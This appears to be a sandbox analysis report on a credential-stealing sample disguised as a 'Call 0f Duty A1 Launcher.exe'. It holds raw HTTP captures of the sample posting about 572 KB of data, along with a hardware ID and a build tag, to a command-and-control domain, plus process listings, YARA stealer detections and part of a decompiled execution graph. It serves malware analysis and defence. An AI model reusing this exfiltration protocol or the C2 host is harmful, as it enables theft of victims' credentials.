                                                                                    Set-Cookie: PHPSESSID=cshr5ecod0hcvh20v0t1icj69i; expires=Wed, 19-Mar-2025 07:58:30 GMT; Max-Age=9999999; path=/
                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                    Pragma: no-cache
                                                                                    cf-cache-status: DYNAMIC
                                                                                    vary: accept-encoding
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Uh4C7LLbxzYgNsYP0yF%2F66IJLZt42lctS5P9C5waaDL3QD8eh5WUkQagsbiBj%2Bu8ChHLMNhDe9qsOhldGkvGfVtfywmIRu7mMPg52X0h1XLG4hCS0AlcikUI25ZpCGUyv5g%2FDRs%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8e71c0374c35c35f-EWR
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1526&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2844&recv_bytes=2140&delivery_rate=1812538&cwnd=174&unsent_bytes=0&cid=f5557b75938786b0&ts=754&x=0"
                                                                                    2024-11-23 14:11:52 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                    Data Ascii: eok 8.46.123.75
                                                                                    2024-11-23 14:11:52 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6192.168.2.549710104.21.33.1164434832C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-11-23 14:11:53 UTC281OUTPOST /api HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: multipart/form-data; boundary=4IT2IB4L4W5OEV
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Content-Length: 572377
                                                                                    Host: property-imper.sbs
                                                                                    2024-11-23 14:11:53 UTC15331OUTData Raw: 2d 2d 34 49 54 32 49 42 34 4c 34 57 35 4f 45 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 35 37 34 36 44 34 39 37 41 37 45 34 46 34 41 43 33 44 39 42 42 44 38 46 42 31 46 42 34 35 33 0d 0a 2d 2d 34 49 54 32 49 42 34 4c 34 57 35 4f 45 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 34 49 54 32 49 42 34 4c 34 57 35 4f 45 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 42 56 6e 55 71 6f 2d 2d 40 73 61 73 63 68 6b 61 71 0d 0a 2d 2d 34 49 54 32
                                                                                    Data Ascii: --4IT2IB4L4W5OEVContent-Disposition: form-data; name="hwid"E5746D497A7E4F4AC3D9BBD8FB1FB453--4IT2IB4L4W5OEVContent-Disposition: form-data; name="pid"1--4IT2IB4L4W5OEVContent-Disposition: form-data; name="lid"BVnUqo--@saschkaq--4IT2
                                                                                    2024-11-23 14:11:53 UTC15331OUTData Raw: 62 d4 10 5d 45 35 ee 53 5a 9d 6e ed 8b 04 8c 4f a2 0a ad 8a 34 be a3 95 c4 e1 33 a0 40 08 a7 85 86 3b 7f 39 77 3d 81 98 9e 78 8a 7d 1b 18 ae 77 91 bc 09 f0 82 e4 b6 7a 86 bb 90 4d 7f a8 ba 33 2d eb ad 68 19 5a 13 97 2a c9 60 0e bd 1b 54 7a c9 d5 8d a5 ac df 53 b2 ce ff 86 3b ae 9d d9 e0 a3 02 3a 1e 33 02 df a8 d4 28 8b 87 6d 58 39 f3 e7 fb 6d 1a 37 0b ba d0 94 23 21 8d 73 45 3b 5c fa 06 be a0 09 18 a9 62 d0 16 6e 64 16 82 94 5b 0b 26 f7 1a d9 0a 22 db 05 81 50 fe 24 3e e1 97 98 83 3b fe 1c 68 5a a5 d3 17 af 16 f1 cb 44 2f 7a 64 3c 1c b2 93 38 34 96 79 32 33 a3 14 6a 17 48 06 57 7e 9f f2 5a bc 2e 60 ee 66 44 13 5a df b7 7a 5a 2d b9 ca 35 14 66 78 cb a2 56 c4 78 27 ba dd af 8b 70 09 9b fe 0a e3 7f 49 f0 af 2e 25 d1 13 34 c0 24 78 6e 9a 88 18 72 78 af 98 f4
                                                                                    Data Ascii: b]E5SZnO43@;9w=x}wzM3-hZ*`TzS;:3(mX9m7#!sE;\bnd[&"P$>;hZD/zd<84y23jHW~Z.`fDZzZ-5fxVx'pI.%4$xnrx
                                                                                    2024-11-23 14:11:53 UTC15331OUTData Raw: ea a3 13 49 89 79 c6 2a fc bd 08 83 5b 7f fd a6 3a 75 1e 79 4c 2a 78 c7 fa f3 69 0c e5 65 32 39 b5 f8 37 d7 c0 a4 d9 ef 96 ea 80 f4 35 be fa 4d 65 da 41 1c bb 98 10 c9 8c a7 26 9c b4 17 14 13 ef fc 38 2b 26 3f 1c 80 8d 24 ae ae 7e 20 c8 4b e3 3b 77 90 fa 4e db 9c d7 ea 4a 40 7e 75 c3 0d 61 aa 8a 39 62 0e 51 77 b5 16 2e 8d 19 61 66 94 b8 29 05 d7 dd 77 93 23 83 e8 9b 62 2b ea 63 af 0f 56 df 59 ed 79 db ad ca a9 11 4e 0e e6 cc d2 3b 56 1c 1e 05 93 50 3f 1f 33 bc 05 2f bf 59 ef 0f b2 fb a5 cf 33 7c 38 4d f1 4d 23 24 16 1c bf 23 cb 6f 8c cb 7f 6f 78 d3 7e ea 60 c5 af f3 b3 63 29 1e be da fd de 0f 36 7e e5 f3 ea fa 29 8b d0 3b 97 4f 6f 1f 41 ac b8 77 83 93 79 c9 a1 71 fa 1e 3f a3 66 47 1f 58 89 b0 e6 cc b3 1d 58 55 5e 4f f7 d4 76 f9 ef f5 e9 df 73 d4 6e c3 d3
                                                                                    Data Ascii: Iy*[:uyL*xie2975MeA&8+&?$~ K;wNJ@~ua9bQw.af)w#b+cVYyN;VP?3/Y3|8MM#$#oox~`c)6~);OoAwyq?fGXXU^Ovsn
                                                                                    2024-11-23 14:11:53 UTC15331OUTData Raw: 8e a0 6a 70 67 9e b1 72 42 45 67 ce 4f a5 77 fe 7b 07 af 78 40 65 d8 8b 47 9f 57 6d d8 77 bf 9d ee f7 8b a7 56 2d 55 ed 2f ff fe c9 6d 59 88 7b 48 ea d1 79 50 1a c7 77 4a e4 59 78 da c9 50 cb 5f a2 41 f3 0c c0 38 eb 9e 5f 54 f5 fe bd c6 01 c9 e4 3b 43 a7 48 b8 fb c1 be ae 4c 03 dd c2 39 51 f6 f7 f4 ce 57 b9 9d ec 99 82 96 d3 c3 1d 06 2a 3e 9f f2 25 fc 1b 5f d6 0a fc 28 ad 96 c7 ab 71 c8 78 86 e4 1e 98 7d 46 12 12 ae 9c 5e 1e 6e 19 e9 28 d7 d0 b6 d9 6a f6 8c 0a 7c 3d 24 86 dd 87 02 ef ad 2b e4 ae 0e 3b de f9 5a 7e c3 2d b7 18 e4 56 b9 f5 1d 9e c9 e8 eb 08 60 05 36 69 bf 12 ed 3c a1 30 cf b1 9d 39 a4 f0 05 9e 96 09 7b cf da 99 7a f6 52 b5 90 15 a2 e1 ba 33 bd e3 67 1f 1c 6e 4b 2a e7 fb f0 7d 4b fa f2 43 76 f2 87 6a bd 88 a7 29 45 ec a4 c1 b1 2e f6 f6 0f bb
                                                                                    Data Ascii: jpgrBEgOw{x@eGWmwV-U/mY{HyPwJYxP_A8_T;CHL9QW*>%_(qx}F^n(j|=$+;Z~-V`6i<09{zR3gnK*}KCvj)E.
                                                                                    2024-11-23 14:11:53 UTC15331OUTData Raw: b8 9f b2 36 a2 b8 76 a5 89 86 45 8c e1 df 39 27 b4 51 e6 04 0e 47 c1 8e 78 70 f8 37 f7 0f 16 92 10 bb 77 74 37 33 dd ee 73 9e 6c 54 e5 3e ba 34 52 94 81 cc 0a c2 94 6e 65 f5 b9 78 cb 88 1e 94 e1 34 87 12 3a 2c 96 30 fd 8c 15 c2 77 8b a3 2f 98 73 7d 62 aa 5d 02 ee 19 d5 bb bc 05 dd de 9f 5e 17 fd 3f 65 64 8b 0e 0a b8 e9 35 e6 54 70 17 0d 3e dc 79 d9 c0 05 06 ab 1c 87 6d d4 5d 70 82 5b 6f df f9 ed 7d a7 63 ee af 2f e9 10 a4 24 79 d9 fb e8 3b d5 53 94 74 3f ec df 7b b5 27 04 93 f5 58 10 c3 26 11 e6 f9 7f cc d8 dd 3d 36 92 a0 78 84 6b 37 5a 00 e9 91 b0 ec dc 6b 01 c6 e7 52 5a 4a 13 1a 59 1f 9a 77 14 30 11 f7 07 68 27 40 eb 27 f6 96 60 42 fd 11 2a a2 2d 31 48 51 75 81 28 77 94 71 70 44 f0 e7 f5 05 7e 2f 70 fa ea 31 e1 6d de 1f ac 97 de 21 e9 71 84 65 99 38 c8
                                                                                    Data Ascii: 6vE9'QGxp7wt73slT>4Rnex4:,0w/s}b]^?ed5Tp>ym]p[o}c/$y;St?{'X&=6xk7ZkRZJYw0h'@'`B*-1HQu(wqpD~/p1m!qe8
                                                                                    2024-11-23 14:11:53 UTC15331OUTData Raw: c8 f0 07 98 51 da 3e 93 0d 4d 94 f8 9d 42 63 22 23 a6 f6 bc 3a 99 b0 8c f2 b0 4b 5a f7 0d 91 83 64 c6 57 26 95 48 3e 98 3b b9 5b c5 b8 23 05 2c 24 95 c3 8b 5f b6 ce 28 e6 70 7b 8a 9b 97 c0 16 7f 25 f6 09 ba 8f ef a8 af bd ff 23 7f ab 32 3d f4 76 ec 0e 6a e6 50 c3 4b 74 82 32 5d ff c1 1e 82 cf 52 fe 09 9b 46 a3 3c eb 7b f2 d2 ce d5 4c 0e a3 3d 2e b8 cb dd f2 cd 6a 75 6e f6 c1 26 93 bf 12 8e 62 db 7b a3 fd d5 5e ed 23 06 cc 56 4f a9 5c 85 f0 b0 7c 8b a2 76 c1 f2 1a be db d8 4d 94 80 ea 8a bc 0c 4b 6c 9e 38 9f 14 57 6d 67 d6 64 3d 5a 9b 11 10 c2 b5 91 fd 2f a1 95 30 54 67 30 f2 25 96 b7 3c ed 51 98 61 1c 68 87 26 72 6e f0 94 fc 83 db 0a 23 24 7c 15 37 e0 80 d7 d9 d5 55 ab 5e 6c 00 2d 8a 49 86 5a 38 82 1e 2a fb 84 ed f8 18 a0 8f b6 35 a7 e8 bd dc d1 3b 86 85
                                                                                    Data Ascii: Q>MBc"#:KZdW&H>;[#,$_(p{%#2=vjPKt2]RF<{L=.jun&b{^#VO\|vMKl8Wmgd=Z/0Tg0%<Qah&rn#$|7U^l-IZ8*5;
                                                                                    2024-11-23 14:11:53 UTC15331OUTData Raw: 34 25 0f 48 95 d8 05 c3 2e 68 bf 6c e6 05 7b aa 95 c6 6d 7b e4 0b e3 96 cd 30 db 73 fc 04 bb bf 11 87 1f df 0a c4 bd 18 39 7e 2b 04 02 cd 15 21 88 db 88 08 c7 62 6a 7b d9 fa a5 66 67 b4 84 2a fd 9b 3f f3 fa 99 b8 86 7f 58 e1 69 50 ea 75 36 92 31 e6 48 98 6b 6e 97 85 08 9f c2 79 41 96 55 46 9f 48 0d db 36 c8 92 33 62 ce 77 18 06 8c c2 59 e5 0f 5c 13 b5 41 e8 e0 73 13 99 f3 b5 72 1c a1 c5 78 bb 90 d9 a5 d9 dd 60 28 03 46 98 65 57 99 74 7f 1c ab e9 37 84 51 92 f0 ef 97 4b b8 65 cf 54 a7 78 1c 59 48 98 f3 79 fb 4a 02 b0 1d ae 7a 2b 0b 52 03 52 e5 66 44 40 b8 4f 17 44 cf c2 b1 66 91 c0 e2 0b cf 03 1d 6f 43 cd 6e d9 de e7 fe 9a 21 e7 a5 b0 bd e3 3c 69 c1 ca 9d f3 56 03 a5 87 57 8e cd b0 0d 9f e9 01 0f d9 7f 5e 56 95 1b ec 22 b2 ea 1e 4d c8 5d 07 04 64 04 0c 95
                                                                                    Data Ascii: 4%H.hl{m{0s9~+!bj{fg*?XiPu61HknyAUFH63bwY\Asrx`(FeWt7QKeTxYHyJz+RRfD@ODfoCn!<iVW^V"M]d
                                                                                    2024-11-23 14:11:53 UTC15331OUTData Raw: 01 99 23 1e 02 82 25 b0 d6 f9 e5 2c 58 6b 70 fa 7a 3e eb 29 c3 1b e2 37 a6 8f 3c 04 9a 86 97 8f c6 7d e5 b9 7d 54 39 ae 22 92 ed 51 c4 f2 8f 5b d0 db 9e dd a7 bb 92 64 92 d6 1c bf 5f 0d e6 2d 4b 61 f8 7b 58 48 91 33 3a be c4 e6 1e 59 bf bb ed 21 76 1a bf c2 f4 59 ab fa 20 48 60 87 ad 9b 6e a6 8f 2d 2a 6c af 30 5a 63 11 e0 f7 f0 4f 97 bb d7 7c 72 84 e9 87 be c0 08 2c b9 d3 4b 57 fe 72 55 d7 77 ce 0b 3a b6 c0 65 9d 64 03 28 27 32 ae f3 50 84 df 4c 2f 16 cc cd e5 cf fb bb cb 41 a7 61 84 e2 f6 fc 3e 28 95 31 a8 ac 37 88 04 c4 a2 bd 7b 24 7a 03 1c 14 7f 18 e2 d2 2e 01 aa d2 ce 22 1b 0c 84 44 a8 ae 9e 30 84 d7 3c 19 f7 69 2c 3b 86 b8 5c ac e9 81 6e 30 46 93 24 87 20 5c 05 b1 26 1f 29 69 3f 02 f3 36 84 2f 95 26 9e cb 58 b9 f3 8f 5f 8d d3 3f 2d 7f c6 72 de 1b 08
                                                                                    Data Ascii: #%,Xkpz>)7<}}T9"Q[d_-Ka{XH3:Y!vY H`n-*l0ZcO|r,KWrUw:ed('2PL/Aa>(17{$z."D0<i,;\n0F$ \&)i?6/&X_?-r
                                                                                    2024-11-23 14:11:53 UTC15331OUTData Raw: af 73 21 37 4a 0d 4f d7 d6 c3 da f3 a7 df c6 73 f5 8e 28 f3 50 d2 eb 27 94 06 a4 7e 2b 27 da 7c c9 5b 07 4b 6c 45 68 28 d0 d2 e6 b1 6c 6c 4f ee 76 65 fd 7a 91 4b 39 75 89 a2 d8 78 46 4d 20 1f 13 e3 ed cd 28 65 f3 d7 54 16 3f 4f 68 b7 37 ac 44 bc 6f de 4a 43 45 06 48 13 7a 23 de e8 e2 bd 00 ec 27 ba 77 7f 2b 6b d2 b0 6d a4 95 fc 70 bb ec 2d 4b c1 8e dc 22 bb ba 6c 7e 2a 79 9b 0a 47 0e af aa 2d 3b 38 66 9b dc 30 25 c8 45 eb 18 15 61 c8 27 f7 6d 48 2c 2f 9c 35 cb f6 e7 7d ac 3e f8 10 eb 12 51 26 ee e4 51 7b 15 d5 a4 34 20 66 6b 26 06 a0 65 06 6a db 44 f4 67 ef 03 3c 13 88 43 cd 62 24 2f 50 32 3d b3 d6 4f 09 f0 17 9b c8 d0 07 a8 46 2a 3b 79 58 6f ce 62 a8 2a 01 e1 cc ce 9d a5 bf 34 88 76 f1 5c 2a 94 52 61 f8 dd 7b 29 09 52 be 54 05 44 b8 bd 4a 8f 9e 4e 1f b7
                                                                                    Data Ascii: s!7JOs(P'~+'|[KlEh(llOvezK9uxFM (eT?Oh7DoJCEHz#'w+kmp-K"l~*yG-;8f0%Ea'mH,/5}>Q&Q{4 fk&ejDg<Cb$/P2=OF*;yXob*4v\*Ra{)RTDJN
                                                                                    2024-11-23 14:11:53 UTC15331OUTData Raw: ef 23 9e a0 95 12 97 4f 38 21 3b a3 83 ec d4 ea c3 5e 9c 44 dd a0 ce 21 d2 23 7e 23 af ff 4e d8 f0 28 d1 4e 82 23 a5 c1 af 7a 3c 20 e5 03 94 5a d5 e7 21 65 ba 72 b2 99 d2 55 bd 55 f5 68 13 21 b0 72 d6 a3 ce 09 c9 11 da a0 d6 c2 e1 09 9c bd ab 36 3d f1 6c 6d b5 7a a7 78 1c f0 51 d6 e5 ea bf 4f 1e 55 d4 58 ef 38 13 d1 a5 d8 f2 e7 68 9a 29 84 70 71 5f 7d b1 55 91 55 b7 f2 fc c8 d6 4c b5 29 9b bc dc 79 c2 72 c9 1c b9 5f 7e c0 ad 7c 53 72 d1 0c c0 0d 1b 83 ce 37 70 53 35 c7 ef f7 87 a3 e0 29 c1 ce 55 77 79 a9 1d 9d 48 f6 88 38 35 d9 96 84 20 c5 c2 f8 b9 1f 82 69 b9 1f 95 13 d7 25 c6 16 d2 8f 9f d3 14 fb 8a 71 d7 24 1c 97 21 74 4b f6 5d fe 17 9b 7c 56 eb c4 29 d9 a7 3e 94 7b 71 9d a6 c1 36 6f 7f 5b dc 26 e3 91 5d 27 f0 d2 b7 28 62 0c ca e9 8d af 5d 53 51 c2 b4
                                                                                    Data Ascii: #O8!;^D!#~#N(N#z< Z!erUUh!r6=lmzxQOUX8h)pq_}UUL)yr_~|Sr7pS5)UwyH85 i%q$!tK]|V)>{q6o[&]'(b]SQ
                                                                                    2024-11-23 14:11:56 UTC1025INHTTP/1.1 200 OK
                                                                                    Date: Sat, 23 Nov 2024 14:11:56 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Set-Cookie: PHPSESSID=58g28onp8d5bt26ccraepql426; expires=Wed, 19-Mar-2025 07:58:34 GMT; Max-Age=9999999; path=/
                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                    Pragma: no-cache
                                                                                    cf-cache-status: DYNAMIC
                                                                                    vary: accept-encoding
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Rn%2FmwTSDJABA6HKNzgwl7372dH%2BszkBtigMZeZFqcn9H%2BCenlADqOSA6%2FN%2BZHoAYMvHOOhMidAXx4PlALDQFTst5JoaRUuNYBHMgkNbf1nxBuPrRtEs91LQWFRWaypprcC240kM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8e71c0468a3e0f60-EWR
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1620&sent=295&recv=595&lost=0&retrans=0&sent_bytes=2844&recv_bytes=574922&delivery_rate=1738095&cwnd=211&unsent_bytes=0&cid=d43de7345bafa6f5&ts=2845&x=0"


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7192.168.2.549715104.21.33.1164434832C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-11-23 14:11:57 UTC266OUTPOST /api HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Content-Length: 86
                                                                                    Host: property-imper.sbs
                                                                                    2024-11-23 14:11:57 UTC86OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 42 56 6e 55 71 6f 2d 2d 40 73 61 73 63 68 6b 61 71 26 6a 3d 26 68 77 69 64 3d 45 35 37 34 36 44 34 39 37 41 37 45 34 46 34 41 43 33 44 39 42 42 44 38 46 42 31 46 42 34 35 33
                                                                                    Data Ascii: act=get_message&ver=4.0&lid=BVnUqo--@saschkaq&j=&hwid=E5746D497A7E4F4AC3D9BBD8FB1FB453
                                                                                    2024-11-23 14:11:58 UTC1017INHTTP/1.1 200 OK
                                                                                    Date: Sat, 23 Nov 2024 14:11:58 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Set-Cookie: PHPSESSID=mgrla8dktqlsuggjli8765g8hs; expires=Wed, 19-Mar-2025 07:58:37 GMT; Max-Age=9999999; path=/
                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                    Pragma: no-cache
                                                                                    cf-cache-status: DYNAMIC
                                                                                    vary: accept-encoding
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zM0gI2RsxxwHLnHwyOTZc6TllG%2Ftf46xLSSxxm5ECIHpm8mLztNPpELn%2F1Xfa5lp%2FQ9ABrNV%2FjFR9v3l69M8CA223p3Cn7JZa7qUzQPZZpcUUKC%2BcFHQXkfNOnUsNYAQEz3ptxM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8e71c060c8c86a53-EWR
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1746&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2845&recv_bytes=988&delivery_rate=1693735&cwnd=233&unsent_bytes=0&cid=b4dc44206f8e5eec&ts=738&x=0"
                                                                                    2024-11-23 14:11:58 UTC126INData Raw: 37 38 0d 0a 4d 7a 70 77 43 50 6d 2f 66 73 70 64 31 4e 2b 79 37 6c 65 78 62 33 57 4c 71 4c 4e 47 2f 75 7a 50 48 54 6f 47 33 52 78 4a 4c 6a 52 6f 51 56 4a 39 32 34 56 63 6f 69 6d 67 72 34 69 79 65 4f 31 41 52 4c 2b 66 6e 58 4c 4c 77 76 73 71 46 44 37 73 51 47 5a 4e 57 31 31 53 48 33 75 4e 6b 52 75 79 4f 50 62 7a 6b 49 67 6a 6b 31 56 46 70 34 72 57 5a 4d 54 63 73 6b 41 3d 0d 0a
                                                                                    Data Ascii: 78MzpwCPm/fspd1N+y7lexb3WLqLNG/uzPHToG3RxJLjRoQVJ924Vcoimgr4iyeO1ARL+fnXLLwvsqFD7sQGZNW11SH3uNkRuyOPbzkIgjk1VFp4rWZMTcskA=
                                                                                    2024-11-23 14:11:58 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Click to jump to process

                                                                                    Click to jump to process

                                                                                    Click to dive into process behavior distribution

                                                                                    Click to jump to process

                                                                                    Target ID:0
                                                                                    Start time:09:11:36
                                                                                    Start date:23/11/2024
                                                                                    Path:C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe"
                                                                                    Imagebase:0x360000
                                                                                    File size:495'616 bytes
                                                                                    MD5 hash:FAD119B9DB79CCBFE3A65A13F0822B22
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:low
                                                                                    Has exited:true

                                                                                    Target ID:1
                                                                                    Start time:09:11:36
                                                                                    Start date:23/11/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff6d64d0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:3
                                                                                    Start time:09:11:36
                                                                                    Start date:23/11/2024
                                                                                    Path:C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe"
                                                                                    Imagebase:0x360000
                                                                                    File size:495'616 bytes
                                                                                    MD5 hash:FAD119B9DB79CCBFE3A65A13F0822B22
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2112166479.0000000003572000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2133799366.0000000003572000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2156727898.0000000003573000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2089652859.0000000003573000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2133185254.0000000003572000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2159389391.000000000357F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2089726082.0000000003577000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                    Reputation:low
                                                                                    Has exited:true

                                                                                    Reset < >

                                                                                      Execution Graph

                                                                                      Execution Coverage:4%
                                                                                      Dynamic/Decrypted Code Coverage:0.4%
                                                                                      Signature Coverage:7.6%
                                                                                      Total number of Nodes:1866
                                                                                      Total number of Limit Nodes:22
                                                                                      execution_graph 11213 37a2b0 11214 37a2cb 11213->11214 11215 37a2bb 11213->11215 11219 37a3b5 11215->11219 11218 37b0cb __freea 14 API calls 11218->11214 11220 37a3ca 11219->11220 11223 37a3d0 11219->11223 11221 37b0cb __freea 14 API calls 11220->11221 11221->11223 11222 37b0cb __freea 14 API calls 11224 37a3dc 11222->11224 11223->11222 11225 37b0cb __freea 14 API calls 11224->11225 11226 37a3e7 11225->11226 11227 37b0cb __freea 14 API calls 11226->11227 11228 37a3f2 11227->11228 11229 37b0cb __freea 14 API calls 11228->11229 11230 37a3fd 11229->11230 11231 37b0cb __freea 14 API calls 11230->11231 11232 37a408 11231->11232 11233 37b0cb __freea 14 API calls 11232->11233 11234 37a413 11233->11234 11235 37b0cb __freea 14 API calls 11234->11235 11236 37a41e 11235->11236 11237 37b0cb __freea 14 API calls 11236->11237 11238 37a429 11237->11238 11239 37b0cb __freea 14 API calls 11238->11239 11240 37a437 11239->11240 11245 37a52e 11240->11245 11246 37a53a ___scrt_is_nonwritable_in_current_image 11245->11246 11261 378161 EnterCriticalSection 11246->11261 11248 37a56e 11262 37a58d 11248->11262 11250 37a544 11250->11248 11252 37b0cb __freea 14 API calls 11250->11252 11252->11248 11253 37a599 11254 37a5a5 ___scrt_is_nonwritable_in_current_image 11253->11254 11266 378161 EnterCriticalSection 11254->11266 11256 37a5af 11257 37a2d1 _unexpected 14 API calls 11256->11257 11258 37a5c2 11257->11258 11267 37a5e2 11258->11267 11261->11250 11265 378178 LeaveCriticalSection 11262->11265 11264 37a45d 11264->11253 11265->11264 11266->11256 11270 378178 LeaveCriticalSection 11267->11270 11269 37a2c3 11269->11218 11270->11269 11283 37aca2 11286 378178 LeaveCriticalSection 11283->11286 11285 37aca9 11286->11285 10319 3783ac 10320 37b0cb __freea 14 API calls 10319->10320 10321 3783c4 10320->10321 10780 377310 10783 377337 10780->10783 10784 377343 ___scrt_is_nonwritable_in_current_image 10783->10784 10791 378161 EnterCriticalSection 10784->10791 10786 37737b 10792 377399 10786->10792 10787 37734d 10787->10786 10789 37c1fa __strnicoll 14 API calls 10787->10789 10789->10787 10791->10787 10795 378178 LeaveCriticalSection 10792->10795 10794 377335 10795->10794 10400 375610 10401 375618 10400->10401 10419 3782ea 10401->10419 10403 375623 10426 3750f0 10403->10426 10405 375444 4 API calls 10407 3756ba 10405->10407 10406 375638 __RTC_Initialize 10417 375695 10406->10417 10432 374f6a 10406->10432 10409 375651 10435 3773a5 10409->10435 10413 375667 10468 375933 10413->10468 10415 37568a 10474 3772a4 10415->10474 10417->10405 10418 3756b2 10417->10418 10420 37831c 10419->10420 10421 3782f9 10419->10421 10420->10403 10421->10420 10422 37b757 __strnicoll 14 API calls 10421->10422 10423 37830c 10422->10423 10424 377d69 __strnicoll 48 API calls 10423->10424 10425 378317 10424->10425 10425->10403 10427 375100 10426->10427 10428 3750fc 10426->10428 10429 375444 4 API calls 10427->10429 10431 37510d ___scrt_release_startup_lock 10427->10431 10428->10406 10430 375176 10429->10430 10431->10406 10481 374f7f 10432->10481 10436 3773ff 10435->10436 10437 377437 10436->10437 10439 377421 10436->10439 10446 37565c 10436->10446 10438 37a880 58 API calls 10437->10438 10440 37743d 10438->10440 10441 37b757 __strnicoll 14 API calls 10439->10441 10516 37ca78 GetModuleFileNameW 10440->10516 10443 377426 10441->10443 